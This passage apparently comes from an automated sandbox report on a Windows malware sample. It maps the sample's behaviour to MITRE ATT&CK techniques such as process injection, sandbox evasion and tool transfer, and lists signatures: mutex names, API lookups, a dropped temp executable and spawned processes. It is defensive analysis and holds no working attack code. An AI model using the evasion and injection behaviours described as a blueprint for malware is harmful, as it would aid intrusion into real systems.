"T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Thread Local Storage", "attck_id": "T1055.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/005", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Safe Mode Boot", "attck_id": "T1562.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Dynamic API Resolution", "attck_id": "T1027.007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/007", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Make and Impersonate Token", "attck_id": "T1134.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/003", "suspicious_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "informative_identifiers_count": 9}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 3, "informative_identifiers_count": 14}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "suspicious_identifiers_count": 2, "informative_identifiers_count": 6}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 3, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 3, "informative_identifiers_count": 4}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 3, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "malicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp directory", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" writes to a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\085cda53603755dc.exe\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrug\"\n \"Global\\giojheiowrghtiovhjwiojrug\"\n \"\\Sessions\\1\\BaseNamedObjects\\Global\\giojheiowrghtiovhjwiojrugzyb\"\n \"Global\\giojheiowrghtiovhjwiojrugzyb\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"085cda53603755dc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004952)\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"GetProcAddress\" with a parameter UnregisterTraceGuids (UID: 00000000-00004952)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetUserNameExA (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthorityCount (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter GetSidSubAuthority (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter SHGetKnownFolderPath (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CopySid (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegGetValueA (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExA (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00002432)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"\n \"085cda53603755dc.exe\" file has an entrypoint instructions - \"sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 1,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,lea\tesi, [esi],sub\tesp, 0xc,mov\tdword ptr [0x534fd4], 0,call\t0x4131e0,add\tesp, 0xc,jmp\t0x401180,nop\t,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,mov\tebp, esp,sub\tesp, 0x18,mov\teax, dword ptr [0x4802d0],test\teax, eax,je\t0x40153b,mov\tdword ptr [esp], 0x481020,call\tdword ptr [0x5365c0],mov\tedx, 0,sub\tesp, 4,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"14001500da597f76@api-ms-win-downlevel-advapi32-l1-1-0.dll\"\n \"15001600c03e296a@ADVAPI32.dll\"\n \"0e000f00703f296a@ADVAPI32.dll\"\n \"0e000f00cc3f296a@ADVAPI32.dll\"\n \"11001200b447296a@ADVAPI32.dll\"\n \"110012004848296a@ADVAPI32.dll\"\n \"120013008c48296a@ADVAPI32.dll\"\n \"12001300e448296a@ADVAPI32.dll\"\n \"14001500386e296a@ADVAPI32.dll\"\n \"14001500506e296a@ADVAPI32.dll\"\n \"14001500686e296a@ADVAPI32.dll\"\n \"17001800806e296a@ADVAPI32.dll\"\n \"0d000e00986e296a@ADVAPI32.dll\"\n \"11001200a86e296a@ADVAPI32.dll\"\n \"11001200bc6e296a@ADVAPI32.dll\"\n \"0d000e004466296a@WININET.dll\"\n \"0d000e00b466296a@WININET.dll\"\n \"10001100ec66296a@WININET.dll\"\n \"100011009067296a@WININET.dll\"\n \"10001100006f296a@WININET.dll\"\n \"10001100146f296a@WININET.dll\"\n \"14001500286f296a@WININET.dll\"\n \"14001500406f296a@WININET.dll\"\n \"12001300586f296a@WININET.dll\"\n \"120013006c6f296a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" called \"CreateProcessW\" with parameter \":*C:\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe *\" - (UID: 00000000-00004952)\n \"085cda53603755dc.exe\" called \"CreateProcessW\" with parameter \"a ZZZZZZVRVVG\" - (UID: 00000000-00004844)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an executable section named \".text\"\n \"085cda53603755dc.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an writable section named \".data\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an writable section named \".bss\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an writable section named \".idata\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an writable section named \".CRT\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an writable section named \".tls\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" has an writable section named \".rsrc\"\n \"085cda53603755dc.exe\" has an writable section named \".data\"\n \"085cda53603755dc.exe\" has an writable section named \".bss\"\n \"085cda53603755dc.exe\" has an writable section named \".idata\"\n \"085cda53603755dc.exe\" has an writable section named \".CRT\"\n \"085cda53603755dc.exe\" has an writable section named \".tls\"\n \"085cda53603755dc.exe\" has an writable section named \".rsrc\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75450000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71c30000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"KERNEL32\" at base 76240000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a2b0000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75450000\n \"085cda53603755dc.exe\" loaded module \"SECUR32.DLL\" at base 752d0000\n \"085cda53603755dc.exe\" loaded module \"RPCRT4.DLL\" at base 75d90000\n \"085cda53603755dc.exe\" loaded module \"SHELL32.DLL\" at base 76850000\n \"085cda53603755dc.exe\" loaded module \"PROFAPI.DLL\" at base 755b0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 6f9f0000\n \"085cda53603755dc.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 758c0000\n \"085cda53603755dc.exe\" loaded module \"WS2_32.DLL\" at base 75d50000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D90000\n \"085cda53603755dc.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75D90000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"085cda53603755dc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00004844)\n \"085cda53603755dc.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004844)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"085cda53603755dc.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143 ...\" (UID: 00000000-00004844)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZVRVVG\" (UID: 00000000-00002432)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"085cda53603755dc.exe\" with commandline \":*C:\\\\caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143 ...\" (UID: 00000000-00004844)\n Spawned process \"085cda53603755dc.exe\" with commandline \"a ZZZZZZVRVVG\" (UID: 00000000-00002432)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" was detected as \"MinGW\" and name: \"Compiler\"\n \"caf705dd1089f2c05550a580e03f9975d44d1aaba0d13e638917d25143ad0f8e\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"\n \"085cda53603755dc.exe\" was detected as \"MinGW\" and name: \"Compiler\"\n \"085cda53603755dc.exe\" was detected as \"GNU linker ld (GNU Binutils)\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"085cda53603755dc.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows\"- Location: [%TEMP%\\085cda53603755dc.exe]- [targetUID: 00000000-00004844]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries 